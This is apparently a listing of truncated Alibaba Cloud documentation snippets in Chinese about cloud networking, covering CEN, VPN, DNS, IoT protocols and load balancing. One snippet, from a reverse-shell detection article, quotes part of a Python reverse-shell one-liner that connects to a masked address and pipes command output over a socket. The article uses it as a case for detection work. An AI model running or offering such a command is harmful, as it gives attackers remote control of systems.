方案概述
本地数据中心通过物理专线和云企业网与云上专有网络实现私网通信后,通信流量未经过加密处理,无法满足安全通信的高要求。使用私网VPN网关可帮您实现基于物理专线的私网流量(以下简称为私网流量)加密通信,提高网络的安全性。本文为您...
使用ACK Net Exporter定位网络问题
inspector_pod_udprcvbuferrors 表示这是一个由ACK Net Exporter提供的指标,它的作用范围是Pod(指标作用范围包含Pod与Node,代表指标表征的数据是Pod或者Node级别有效),它的名称是 udprcvbuferrors,表示单个Pod内出现的UDP报文因为收...
网络FAQ
使用这种转发模型,SLB负载均衡将客户端请求转发到云服务器ECS,ECS服务器通过外网带宽响应给用户,这个响应占用的带宽,在ECS控制台中不显示,它是计入到SLB负载均衡使用的出流量中,因此云监控显示的云服务器ECS带宽和ECS控制台显示带宽...
CoAP连接通信
物联网平台支持CoAP协议连接通信。CoAP协议适用在资源受限的低功耗设备上,尤其是NB-IoT的设备使用。本文介绍基于CoAP协议进行设备接入的流程,及使用DTLS和对称加密两种认证方式下的自主接入流程。基础流程 基于CoAP协议将NB-IoT设备接入...
网络最大传输单元MTU
当前所有ECS实例都支持1500 MTU,8代主售实例规格族(g8i/c8i/r8i/g8a/c8a/r8a/g8ae/c8ae/r8ae/g8y/c8y/r8y)还可以支持8500 MTU。更多信息,请参见 实例规格族。然而能否使用巨型帧进行网络通信还需要考虑到网络链路以及对端主机的MTU限制...
常见问题
本文汇总云企业网产品的常见问题。常见问题快捷链接 问题分类 快捷链接 基本问题 云企业网支持同地域跨账号VPC实例互通么?云企业网支持同账号跨地域VPC实例互通么?一个地域只能创建一个转发路由器实例么?云企业网与(高速通道)VBR上连...
设置SSL加密
实例同时存在内网和外网链路时,如需对内网链路开启强制加密,您需要先释放外网。具体操作,请参见 开通或关闭外网地址。支持最低TLS版本 否 选择支持的最低TLS版本,当前支持TLS版本为1.0、1.1和1.2,低于该版本将被拒绝连接。例如,选择...
加入云企业网
云企业网CEN(Cloud Enterprise Network)可以帮助您在VPC间,VPC与本地数据中心间搭建私网通信通道,实现全网资源的互通。您可以将VPC加入同阿里云账号下的云企业网,也可以通过跨账号授权后将VPC加入到其他阿里云账号下的云企业网。加入...
外网访问
应用配置 配置说明 协议:暴露外网端口使用的协议 外部端口:希望外部可以访问的端口 应用自身端口:内部节点暴露的端口 外网:勾选表明端口为公网访问端口,不勾选为内部访问端口 使用限制 当您的应用配置中有多个自研节点同时需要暴露外...
等保三级预检合规包
RDS实例未申请外网地址 RDS实例未申请外网地址,视为“合规”。8.1.3.1 b)应能够对非授权设备私自联到内部网络的行为进行限制或检查。8.1.3.2 a)应在网络边界或区域之间根据访问控制策略设置访问控制规则,默认情况下除允许通信外受控...
创建VPC连接
如果 专有网络 VPC(Virtual Private Cloud)实例需要与转发路由器下的其他网络(例如同地域VPC、跨地域VPC、本地数据中心等)相互通信,您可以通过创建VPC连接将VPC实例接入转发路由器,接入后,转发路由器可以实现网络实例间的相互通信。...
DNS最佳实践
如下表:Kubernetes版本 推荐的最低CoreDNS版本 v1.14.8以下(停止维护)v1.6.2 v1.14.8及以上,1.20.4以下 v1.7.0.0-f59c03d-aliyun 1.20.4及以上 v1.8.4.1-3a376cc-aliyun 说明 Kubernetes 1.14.8以下的版本现已停止维护,请尽快升级至更...
DNS最佳实践
如下表:Kubernetes版本 推荐的最低CoreDNS版本 v1.14.8以下(停止维护)v1.6.2 v1.14.8及以上,1.20.4以下 v1.7.0.0-f59c03d-aliyun 1.20.4及以上 v1.8.4.1-3a376cc-aliyun 说明 Kubernetes 1.14.8以下的版本现已停止维护,请尽快升级至更...
通过私网访问云电脑介绍
CEN可以在不同的网络实例(专有网络VPC、边界路由器VBR、云连接网CCN等)之间搭建私网通信通道,实现云上和云下资源的互通。详细信息,请参见 什么是云企业网 或 多接入方式构建企业级混合云。专有网络VPC是逻辑上彻底隔离的云上私有网络。...
网络流量路径说明
如果需要直接通过后端ECS对外提供服务,或后端ECS有访问外网的需求,那么需要相应的配置或购买ECS、公网IP、EIP、Anycast EIP、NAT网关等服务。ECS的公网流量访问路径如下图所示。图 2.出网流量路径 总体原则:流量从哪里进来,就从哪里...
PAI灵骏智算服务概述
基于数据中心超大规模RDMA“高速网”和通信流控技术,实现端到端微秒级通信时延,超大规模线性拓展可打造万卡级并行算力。融合生态,拓展创新边界。支持HPC和AI任务融合调度,为科研和AI提供统一协同的底座支撑,促进技术生态融合。云上...
什么是云企业网
云企业网通过转发路由器TR(Transit Router)帮助您在跨地域专有网络之间,专有网络与本地数据中心间搭建私网通信通道,为您打造一张灵活、可靠、大规模的企业级云上网络。组成部分 组件 说明 云企业网实例 云企业网实例是创建、管理一体化...
产品架构
如果需要直接通过后端ECS对外提供服务,或后端ECS有访问外网的需求,那么需要相应的配置或购买ECS、公网IP、EIP、Anycast EIP、NAT网关等服务。ECS的公网流量访问路径如下图所示。图 2.出网流量路径 总体原则:流量从哪里进来,就从哪里...
使用安全隧道远程访问设备
部分物联网设备基于安全的考虑或因部署于私有网络内部,是无法在外网直接访问设备上的服务的。物联网平台提供设备安全隧道产品功能,助您建立双向安全的通信链路,您可基于该通信链路实现对设备的远程访问、远程诊断和管理等功能。背景信息...
HAL说明
create 082 HAL_UDP_create_without_connect 083 HAL_UDP_joinmulticast 084 HAL_UDP_read 085 HAL_UDP_readTimeout 086 HAL_UDP_recv 087 HAL_UDP_recvfrom 088 HAL_UDP_send 089 HAL_UDP_sendto 090 HAL_UDP_write 091 HAL_UptimeMs 092 ...
功能特性
除了架设集群通信的“高速公路”(即RDMA高速网)外,还需要进行合理的通讯调度,避免“堵车”。阿里云通过通信库ACCL实现了GPU和网卡的智能匹配、节点内外物理拓扑自动识别及拓扑感知的无拥塞通信算法,彻底消除网络拥塞,提升网络通信...
专有网络FAQ
VPC定义的默认私网转发网段为10.0.0.0/8、172.16.0.0/12、192.168.0.0/16,用户网段是指在创建VPC时,使用除100.64.0.0/10、224.0.0.0/4、127.0.0.0/8、169.254.0.0/16及其子网外的自定义地址段。如果ECS实例或弹性网卡已经具备了公网访问...
旧版控制台使用说明
云企业网可以帮助您在专有网络VPC(Virtual Private Cloud)之间、VPC与本地数据中心之间搭建私网通信通道,实现同地域或跨地域网络互通。本文为您介绍如何在旧版控制台使用云企业网,并介绍旧版控制台的计费规则和使用限制。切换旧版控制...
设备接入引导
当您希望将设备接入阿里云物联网平台,实现设备集中管理、收集和数据分析、远程控制、保障设备数据安全等能力时,请根据本文的设备接入流程引导,选择设备使用协议并进行云端和设备端开发。前提条件 开通 物联网平台服务。说明 免费开通后...
交付环境要求说明
TCP 9099 所有节点 calico通信 TCP 10250,10251,10252,10255,10256 所有节点 kubelet通信 TCP 16789 所有节点 集群巡检 TCP 30000-32767 所有节点 集群外节点(按需)NodePort Service端口范围,集群内全部放行,集群外按需放行 Worker节点...
API概览
AddDeviceInternetPort 为实例设备配置外网端口 调用AddDeviceInternetPort为实例设备配置NAT规则,属于异步API,规则配置详情参考GetDeviceInternetPort。RestartDeviceInstance 重启实例设备 调用RestartDeviceInstance重启实例设备或...
使用插件部署混合云集群
Samba 445 UDP和TCP SMB服务通信。用于AD组策略对象(GPO)。Kerberos 88 UDP和TCP Kerberos认证。Kerberos 464 UDP和TCP Kerberos重新设置密码。LDAP全局目录 3268 TCP 如果使用i d_provider=ad 选项。NTP 123 UDP NTP服务。可选配置。...
网络安全
networking.k8s.io/v1 kind:NetworkPolicy metadata:name:allow-dns-access namespace:default spec:podSelector:matchLabels:{} policyTypes:Egress egress:to:namespaceSelector:matchLabels:name:kube-system ports:protocol:UDP port:...
DNS解析异常问题排查
tcpdump-i any port 53-C 20-W 200-w/tmp/client_dns.pcap 结合业务日志的报错定位到精准的报错时间的报文信息。说明 在正常情况下,抓包对业务无影响,仅会增加小部分的CPU负载和磁盘写入。以上命令会对抓取到的包进行rotate,最多可以写...
DNS解析异常问题排查
tcpdump-i any port 53-C 20-W 200-w/tmp/client_dns.pcap 结合业务日志的报错定位到精准的报错时间的报文信息。说明 在正常情况下,抓包对业务无影响,仅会增加小部分的CPU负载和磁盘写入。以上命令会对抓取到的包进行rotate,最多可以写...
负载均衡SLB产品家族介绍
支持gRPC协议,实现海量微服务间的高效API通信。NLB:支持TCPSSL协议,可对SSL证书进行集中管理及卸载,有效提升后端业务处理效率。多层次容灾 提供多层次的容灾策略与高可用保障体验。健康检查:定时检测后端服务器运行状况,一旦检测到后...
在ACK集群使用网络策略
通过命令行操作 执行以下命令,为上述名为nginx的应用创建阿里云SLB服务,指定 type=LoadBalancer 来向外网用户暴露nginx服务。vim nginx-service.yaml nginx-service.yaml 文件模板如下。将以下YAML内容粘贴至nginx-service.yaml中。api...
使用 SDK(版本=10.1.32)
实现 H5 与 Native 双向通信 您可以通过调用 JSAPI 和监听特定事件来实现 H5 与 Native 双向通信。在 H5 页面调用 Native 功能 您可以通过调用 JSAPI 来实现 H5 到 Native 的通信。Nebula 容器支持的 JSAPI 及相关参数说明,请参见 内置 JS...
添加UDP监听
如果您需要在CLB实例上转发来自客户端的UDP协议请求,特别是在关注实时性而对可靠性要求相对较低的场景,如视频聊天和金融实时行情推送等,您可以为CLB实例添加一个UDP监听。背景信息 在添加UDP监听前,注意以下限制:UDP监听的250、4789和...
CoAP连接相关问题
本文介绍设备使用物联网平台提供的设备端C语言Link SDK 3.x版本,基于CoAP协议连接物联网平台可能出现的问题和解决方法。说明 设备接入C Link SDK 3.x版本详细内容,请参见 SDK获取。CoAP协议允许 over UDP 接入吗?不支持CoAP over UDP。...
ALIYUN:VPC:ForwardEntry
当为公网NAT网关配置DNAT条目时,需要进行公网通信的ECS实例的私网IP地址,该私网IP地址需满足以下条件:必须属NAT网关所在的VPC的网段。必须被一个ECS实例使用且该实例没有绑定EIP时,DNAT条目才生效。当为VPC NAT网关配置DNAT条目时,...
云安全中心反弹Shell多维检测技术详解
s.send(proc.stdout.read()+proc.stderr.read())\")"Shell攻击者使用编程语言实现标准输入中转,重定向命令执行的输入到中转,有如下常见案例:案例一:python-c"exec(\"import socket,subprocess;s=socket.socket();s.connect(('10.10.XX....
最佳实践概览
私网 通过私网VPN网关实现私网流量加密通信 方案概述 通过静态路由方式实现私网流量加密通信 通过静态和BGP路由方式实现私网流量加密通信 通过BGP路由方式实现私网流量加密通信 IPsec连接绑定转发路由器场景 说明 IPsec连接绑定转发路由器...
MCU+支持TCP的模组
应用场景:设备的硬件由一个MCU加上一个通信模组构成,设备的应用逻辑运行在MCU上,模组上支持了TCP但是并不支持MQTT,MCU通过模组提供的AT指令来控制模组何时连接云端服务以及收发数据。说明 本示例中:示例app+SDK+TCP模组驱动一起消耗...
ECS实例数据传输的实现方式
当您需要为云服务器ECS进行软件部署、数据备份和恢复、数据导入和导出等操作时,您可以使用类Unix/Linux平台上常用的文件传输工具实现。本文通过介绍文件传输的基本原理,以及常用的NETCAT、SCP和Rsync文件传输工具,您可以根据实际需要...
- 产品推荐
- 这些文档可能帮助您